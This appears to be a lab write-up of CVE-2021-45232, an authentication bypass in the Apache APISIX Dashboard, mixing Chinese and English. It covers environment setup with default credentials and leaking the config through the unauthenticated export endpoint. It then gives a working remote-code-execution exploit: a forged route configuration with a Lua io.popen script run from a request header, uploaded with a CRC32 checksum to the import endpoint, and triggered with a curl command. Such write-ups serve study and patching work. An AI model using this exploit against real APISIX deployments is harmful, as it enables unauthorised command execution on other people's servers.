Article Directory
1. Vulnerability introduction
编号: CVE-2021-45232
组件: APISIX
漏洞类型: 身份验证绕过
影响: 身份验证绕过
简述: 在2.10.1之前的Apache APISIX Dashboard中,Manager API使用了两个框架,并在框架‘gin’的基础上引入了框架‘droplet’,所有的API和认证中间件都是基于框架‘droplet’开发的,但有些API直接使用框架‘gin’的接口,从而绕过了认证。
版本影响 :
apache: 2.7.0 < APISIX Dashboard< 2.10.1 2.10.1
2. Vulnerability environment construction
git clone https://github.com/apache/apisix-docker
cd ./apisix-docker/example
First, modify the configuration items in this directory, as shown in the figure, the version version is changed to 2, and the apisix-dashboard version is changed to 2.8
# 下载并启动环境
docker-compose up -d
Next, make some simple configurations to simulate the actual combat environment
默认登陆地址:ip:9000
默认用户名密码:admin/admin
Toggle routing options, select Create
The name is random, it will be used in a
while The target node is random, just go to the next step All
the way to the next step, just submit it
You can see our configuration on the routing interface
3. Vulnerability verification
# 直接访问即可
ip:port/apisix/admin/migrate/export
There is a configuration file leak here.
Take a look, it is the route we just configured that has leaked out.
4 Exploitation
The main utilization process is to execute an extended script in the interface route, and execute system commands through it.
Here is a manual test first.
Note that the configuration file here can be modified, just add the script directly and then
visit http://ip:9000/test. (test is the route name created above)
Enter the container to view: the attention here is. The final script execution is not in the container of port 9000, but in the container of port 9080 of managed apache/apisix as shown in the figure
OK, the next step is how to create a routing configuration containing malicious scripts.
The dashboard import configuration is used here.
Forge a configuration file based on the configuration exported by emport
eval_config = {
"Consumers": [],
"Routes": [
{
"id": str(random.randint(100000000000000000, 1000000000000000000)),
"create_time": 1641259840,
"update_time": 1641260783,
"uri": "/evil",
"name": "evil",
"methods": ["GET", "POST", "PUT", "DELETE", "PATCH", "HEAD", "OPTIONS", "CONNECT", "TRACE"],
"script":"local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)",
"upstream":
{
"nodes":
[{
"host": "1.1.1.1", "port": 8080, "weight": 1}],
"timeout": {
"connect": 6, "send": 6, "read": 6},
"type": "roundrobin",
"scheme": "http",
"pass_host": "pass",
"keepalive_pool": {
"idle_timeout": 60, "requests": 1000, "size": 320}
},
"status": 1
}
],
"Services": [],
"SSLs": [],
"Upstreams": [],
"Scripts": [],
"GlobalPlugins": [],
"PluginConfigs": []
}
# POST传递数据:
# 注意需要添加CRC32校验位
files = {
"file": ("data", data + crc32, "text/data")}
resp = requests.post(url + "/apisix/admin/migrate/import", files=files)
direct attack:
curl http://ip:port/evil -H cmd:ls
As shown in the figure, the attack is successful
5. Problems encountered
5.1 apisix-dashboard报错:The manager-api and apache apisix are mismatched.
It seems that the dashboard2.7 version is not compatible with the latest version of apache apisix. Just change the dashboard to a version above 2.7. Here I changed it to version 2.8
5.2 apisix-dashboard keeps turning in circles
Just refresh, don't wait foolishly there, (っ°Д °;)っ
Refer to the article